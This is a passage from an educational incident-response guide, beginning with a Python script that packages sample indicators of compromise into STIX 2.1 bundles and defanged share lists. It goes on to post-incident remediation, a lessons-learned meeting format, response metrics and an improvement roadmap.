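    "sha256": "[file:hashes.'SHA-256' = '{v}']",
}

# Constructed IOC list (values from the incident write-up; the hash is a placeholder).
SAMPLE_IOCS = [
    ("ipv4", "185.220.101.45", "C2 server"),
    ("domain", "evil-domain.com", "C2 domain"),
    ("email", "phishing@fake-invoice.com", "phishing sender"),
    ("sha256", "0" * 64, "dropper (placeholder hash)"),
]

# First observed C2 contact from the incident timeline (valid_from in the STIX example).
INCIDENT_START = datetime(2025, 1, 6, 18, 32, tzinfo=timezone.utc)

# STIX identifier: <type>--<UUIDv4>
STIX_ID_RE = re.compile(
    r"^[a-z0-9-]+--[0-9a-f]{8}-[0-9a-f]{4}-4[0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}$")


def stix_timestamp(dt):
    """STIX timestamps are UTC, RFC 3339, with a 'Z' suffix."""
    return dt.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%M:%S.000Z")


def make_indicator(ioc_type, value, description, valid_from, tlp="green", now=None):
    if ioc_type not in PATTERNS:
        raise ValueError(f"unsupported IOC type: {ioc_type}")
    if "'" in value:
        # A quote would break out of the pattern literal; refuse rather than emit a bad pattern.
        raise ValueError("IOC value contains a quote; refusing to build the pattern")
    stamp = stix_timestamp(now or datetime.now(timezone.utc))
    return {
        "type": "indicator",
        "spec_version": "2.1",
        "id": f"indicator--{uuid.uuid4()}",
        "created": stamp,
        "modified": stamp,
        "name": description,
        "indicator_types": ["malicious-activity"],
        "pattern": PATTERNS[ioc_type].format(v=value),
        "pattern_type": "stix",
        "valid_from": stix_timestamp(valid_from),
        "object_marking_refs": [TLP_MARKINGS[tlp]],
    }


def make_bundle(iocs, valid_from, tlp="green"):
    objects = [make_indicator(t, v, d, valid_from, tlp) for t, v, d in iocs]
    return {"type": "bundle", "id": f"bundle--{uuid.uuid4()}", "objects": objects}


def validate_indicator(obj):
    """Check the properties a STIX 2.1 consumer will reject an Indicator without."""
    required = ("type", "spec_version", "id", "created", "modified",
                "pattern", "pattern_type", "valid_from")
    return (all(k in obj for k in required)
            and obj["type"] == "indicator"
            and obj["spec_version"] == "2.1"
            and obj["id"].startswith("indicator--")
            and STIX_ID_RE.match(obj["id"]) is not None)


def defang(value):
    """Render an IOC so it cannot be clicked or auto-resolved in a report."""
    value = re.sub(r"^http", "hxxp", value, flags=re.IGNORECASE)
    return value.replace(".", "[.]")


def share_list(iocs, tlp="green"):
    """Defanged one-per-line text for e-mail or chat sharing, headed by its TLP label."""
    lines = [f"TLP:{tlp.upper()}"]
    lines += [f"{t}: {defang(v)}  # {d}" for t, v, d in iocs]
    return "\n".join(lines)


if __name__ == "__main__":
    print(json.dumps(make_bundle(SAMPLE_IOCS, INCIDENT_START), indent=2))
    print(share_list(SAMPLE_IOCS))
```

Set `tlp` to match the audience the guidelines above describe (amber for trusted partners, green for an ISAC); the marking travels with the object, so a receiving MISP or TAXII server can enforce it.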

Attribution Sharing:

  • If APT group identified, share TTPs mapped to MITRE ATT&CK
  • Campaign names and known aliases
  • Malware family identification (e.g., Emotet, TrickBot, Cobalt Strike)

Step 7.3: Defensive Improvements & Remediation

Security Control Enhancements:

Immediate (0-30 days):

1. **Email Security:**
   - Deploy email attachment sandboxing (Proofpoint, Mimecast)
   - Block executable attachments (.exe, .scr, .bat, .ps1)
   - Implement DMARC with p=quarantine (use DMARC Generator tool)

2. **Endpoint Protection:**
   - Tune EDR to reduce alert delay (15 min → 5 min)
   - Deploy application whitelisting on critical systems
   - Enable PowerShell script block logging

3. **Identity & Access:**
   - Mandate MFA for all users (rollout in 2 weeks)
   - Implement privileged access management (PAM)
   - Reduce number of domain admin accounts

4. **Detection:**
   - Deploy IOC-based monitoring rules in SIEM
   - Create alerts for discovered attacker TTPs
   - Implement User and Entity Behavior Analytics (UEBA)

Short-Term (30-90 days):

1. **Security Awareness Training:**
   - Mandatory phishing simulation training for all users
   - Monthly simulated phishing campaigns
   - Incident reporting procedures training

2. **Vulnerability Management:**
   - Implement 7-day SLA for critical vulnerability patching
   - Deploy automated patch management (WSUS, SCCM)
   - Quarterly penetration testing

3. **Backup & Recovery:**
   - Test backup restoration procedures monthly
   - Implement immutable backups (ransomware protection)
   - Verify 3-2-1 backup strategy (3 copies, 2 media types, 1 offsite)

4. **Network Segmentation:**
   - Isolate critical systems (domain controllers, databases)
   - Implement micro-segmentation for sensitive workloads
   - Review and restrict lateral movement paths

Long-Term (90+ days):

1. **Zero Trust Architecture:**
   - Transition to zero trust network access (ZTNA)
   - Implement continuous authentication and authorization
   - Deploy software-defined perimeter (SDP)

2. **Threat Hunting:**
   - Establish proactive threat hunting program
   - Monthly hypothesis-driven hunts based on MITRE ATT&CK
   - Purple team exercises (attacker + defender collaboration)

3. **Security Orchestration:**
   - Deploy SOAR platform for automated response
   - Create automated playbooks for common incidents
   - Integrate threat intelligence feeds into automated blocking

Update IR Playbooks:

  • Incident Response Playbook Generator - Update with lessons learned
  • Document new detection methods discovered during investigation
  • Refine containment procedures based on what worked/didn't work
  • Add new IOC sources and validation steps

Step 7.4: Lessons Learned Meeting

Meeting Structure (2-4 hours):

Participants:

  • Incident Response Team
  • IT Operations
  • Security Leadership
  • Affected Business Units
  • Executive Sponsor

Agenda:

1. **Incident Review** (30 min)
   - Timeline walkthrough
   - Impact assessment
   - Response effectiveness

2. **What Went Well** (30 min)
   - EDR detection capability
   - Rapid containment (15 minutes)
   - Team coordination and communication
   - Clean backup availability

3. **What Went Wrong** (45 min)
   - Phishing email bypassed email gateway
   - User clicked malicious attachment despite training
   - No MFA enabled on compromised account
   - 15-minute delay in EDR alert (missed SLA)

4. **Root Cause Analysis** (30 min)
   - Technical root causes
   - Process gaps
   - Training deficiencies

5. **Action Items** (45 min)
   - Assign owners and deadlines for each improvement
   - Prioritize based on risk reduction
   - Budget approval for new security controls

6. **Metrics Review** (15 min)
   - Mean Time to Detect (MTTD): 9 hours (from infection to detection)
   - Mean Time to Respond (MTTR): 15 minutes (from detection to containment)
   - Dwell Time: 9 hours 15 minutes
   - Time to Recovery: 66 hours

Key Metrics for Continuous Improvement:

| Metric | Current | Target | Industry Benchmark |
|---|---|---|---|
| Mean Time to Detect (MTTD) | 9 hours | < 4 hours | 10 days (Mandiant 2024) |
| Mean Time to Respond (MTTR) | 15 min | < 10 min | 30 min (industry avg) |
| Dwell Time | 9h 15m | < 2 hours | 10 days (global median) |
| False Positive Rate | 35% | < 20% | 25% (SANS 2024) |
| Incident Recurrence | 0% | 0% | 5% (repeat incidents) |

Key Deliverable: Final Incident Report & Improvement Roadmap

Report Distribution:

  • Executive Summary: C-suite, Board of Directors
  • Technical Report: Security team, IT operations
  • Sanitized IOCs: Threat intelligence sharing platforms
  • Lessons Learned: All incident participants

Improvement Roadmap:

**Q1 2025 (Immediate):**
- [ ] Deploy email attachment sandboxing - Owner: IT Security, Due: 2025-02-01
- [ ] Mandate MFA for all users - Owner: Identity Team, Due: 2025-02-15
- [ ] Deploy IOC monitoring rules - Owner: SOC, Due: 2025-01-20
- [ ] Conduct phishing awareness training - Owner: Security Awareness, Due: 2025-02-28

**Q2 2025 (Short-Term):**
- [ ] Implement automated patch management - Owner: IT Ops, Due: 2025-04-30
- [ ] Deploy privileged access management - Owner: Identity Team, Due: 2025-05-31
- [ ] Quarterly penetration testing - Owner: Security, Due: 2025-06-30

**Q3-Q4 2025 (Long-Term):**
- [ ] Zero trust architecture pilot - Owner: Security Architecture, Due: 2025-09-30
- [ ] Threat hunting program launch - Owner: Threat Intel, Due: 2025-10-31
- [ ] SOAR platform deployment - Owner: SOC, Due: 2025-12-31

Success Criteria:

  • No repeat incidents of same attack vector
  • MTTD reduced from 9 hours to < 4 hours
  • MTTR maintained below 10 minutes
  • All action items completed by target dates
  • Improved security maturity score (use Cybersecurity Maturity Assessment)

Conclusion

Effective incident response is not a moment—it's a continuous cycle of preparation, detection, investigation, containment, recovery, and improvement. This seven-stage workflow provides a systematic approach aligned with NIST SP 800-61r3 and SANS best practices, ensuring that your organization can respond to incidents with confidence and competence.

Key Workflow Recap

The seven stages form a complete incident response lifecycle. Stage 1 (Preparation) builds IR capability before incidents occur and continues throughout the program. Stage 2 (Detection) provides rapid triage and validation within 15-60 minutes of alert. Stage 3 (Evidence Preservation) ensures forensically sound collection over 1-3 hours. Stage 4 (Investigation) delivers deep threat analysis and attribution across 2-8 hours. Stage 5 (Containment and Eradication) removes the threat within 2-6 hours. Stage 6 (Recovery) restores operations safely over 2-8 hours. Stage 7 (Lessons Learned) drives continuous improvement over 1-2 weeks following resolution.

Ten essential tools support the complete workflow. Hash Generator enables file identification and malware checking. IOC Extractor extracts indicators from forensic data. IP Risk Checker identifies C2 servers. DNS Lookup supports DNS investigation and validation. Email Authentication Validator verifies email security. Threat Intelligence Feed Aggregator correlates multiple feeds. Incident Response Playbook Generator creates customized IR procedures. MITRE ATT&CK Browser maps TTPs and profiles threats. Malware Deobfuscator analyzes obfuscated scripts. String Extractor extracts IOCs from binaries.

Critical Success Metrics

Mean Time to Detect (MTTD):

  • World-class: < 1 hour
  • Good: < 4 hours
  • Industry average: 10 days

Mean Time to Respond (MTTR):

  • World-class: < 5 minutes
  • Good: < 15 minutes
  • Industry average: 30 minutes

Dwell Time (Compromise to Detection):

  • World-class: < 1 day
  • Good: < 3 days
  • Industry average: 10 days

Continuous Improvement Cycle

Quarterly activities maintain incident response readiness. Conduct tabletop exercises simulating ransomware, data breach, and DDoS scenarios. Perform purple team testing through collaborative red team and blue team exercises. Update playbooks incorporating new threat intelligence and lessons learned from recent incidents. Evaluate tools by reviewing SIEM and EDR effectiveness while working to reduce false positives. Review metrics tracking MTTD, MTTR, and dwell time trends to identify improvement opportunities.

Annual activities ensure program currency and effectiveness. Review the IR plan to update contact lists, escalation paths, and regulatory requirements. Verify retainers by confirming IR firm, legal counsel, and PR firm availability. Audit cyber insurance coverage to verify limits and understand notification requirements. Conduct full-scope penetration testing covering both external and internal attack surfaces. Perform maturity assessment benchmarking against the NIST Cybersecurity Framework to measure program progress.

Integration with Broader Security Operations

SOC integration connects incident response with daily operations. Incident response playbooks become automated SOAR workflows that accelerate response to recurring incident types. IOCs from investigations feed directly into SIEM correlation rules, improving detection of related threats. Threat intelligence gathered during incidents enriches detection capabilities across the organization.

Threat hunting benefits from incident response findings. IR investigations reveal attacker TTPs that inform proactive hunting activities. Hypothesis-driven hunts build on MITRE ATT&CK TTPs discovered during incident investigations. Regular sweeps for IOCs from past incidents detect dormant threats or reinfection attempts.

Security engineering applies lessons learned from incidents. Security architecture improvements address vulnerabilities discovered during investigations. Defense-in-depth strategies evolve based on actual attack paths observed in incidents. Zero trust implementation priorities are informed by lateral movement analysis from real attacks.

GRC (Governance, Risk, Compliance) functions leverage incident data. Incident metrics inform risk assessments by quantifying actual threats faced. Compliance audits leverage IR documentation to demonstrate security controls and response capabilities. Board reporting incorporates security posture improvements demonstrated through incident response metrics.

The Path Forward

The difference between a security event and a business catastrophe often comes down to preparation and execution. By following this workflow, maintaining up-to-date playbooks, conducting regular exercises, and continuously improving based on lessons learned, your organization will be prepared to handle incidents with the confidence and competence that stakeholders, customers, and regulators expect.

Remember: The best time to prepare for an incident is before it happens. The second-best time is now.


About This Guide

This workflow guide is designed for educational purposes, empowering security professionals, SOC analysts, and incident responders with practical knowledge and free tools to build effective incident response capabilities. The tools referenced throughout this guide are provided as free resources to help you learn and practice DFIR techniques.

Target audience includes Security Operations Center (SOC) analysts, incident response team members, IT security professionals, digital forensics investigators, and security managers building IR programs.

Skill levels supported range across the analyst tiers. L1 Analysts will find value in the initial triage and detection content in Stages 1-2. L2 Analysts benefit from the deep investigation and containment procedures in Stages 3-5. L3 Analysts focus on threat intelligence and continuous improvement covered in Stages 6-7.

This guide is intentionally tool-agnostic where commercial products are concerned, focusing instead on methodologies and freely available tools that work across organizations of all sizes. While we reference industry-leading commercial platforms (SIEM, EDR, sandboxes), the core workflow applies regardless of specific vendor selections.

Continuous learning extends beyond this guide. Practice these techniques in home lab environments to build hands-on experience. Participate in CTF (Capture The Flag) competitions to test skills against realistic scenarios. Join threat intelligence sharing communities including ISACs and MISP to stay current on emerging threats. Obtain certifications such as GCIH (GIAC Certified Incident Handler) and GCFA (GIAC Certified Forensic Analyst) to validate expertise and advance your career.


Sources & Further Reading

Training & Certification:

  • GCIH - GIAC Certified Incident Handler
  • GCFA - GIAC Certified Forensic Analyst
  • GCFE - GIAC Certified Forensic Examiner
  • CISSP - Certified Information Systems Security Professional (Domain 7: Security Operations)
  • CEH - Certified Ethical Hacker (Incident Response Module)
